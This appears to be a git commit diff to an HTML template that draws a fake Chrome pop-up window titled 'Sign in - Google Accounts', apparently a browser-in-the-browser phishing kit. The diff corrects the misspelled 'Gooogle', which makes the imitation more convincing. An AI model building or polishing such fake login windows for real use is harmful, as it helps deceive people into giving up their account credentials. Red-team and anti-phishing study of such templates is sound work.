:sparkles: feat(Windows-Chrome): Update minimize button

--- a/Windows-Chrome/index.html
+++ b/Windows-Chrome/index.html
@@ -16,9 +16,7 @@
         <section class="bg-gray-000 h-100p u-center">
             <div class="content u-center">
                 <a
-                    href="
-                https://accounts.google.com
-                /o/oauth2/auth/identifier?response_type=code&client_id=1083004"
+                    href="https://accounts.google.com/o/oauth2/auth/identifier?response_type=code&client_id=1083004"
                     onclick="return loadWindow()"
                     class="clickme u-flex text-gray-800 font-normal"
                     id="clickme"
@@ -45,7 +43,7 @@
                                 id="logo"
                                 class="u-inline"
                             />
-                            <span id="logo-description">Sign in - Gooogle Accounts</span>
+                            <span id="logo-description">Sign in - Google Accounts</span>
                         </div>
 
                         <div class="u-overflow-hidden">
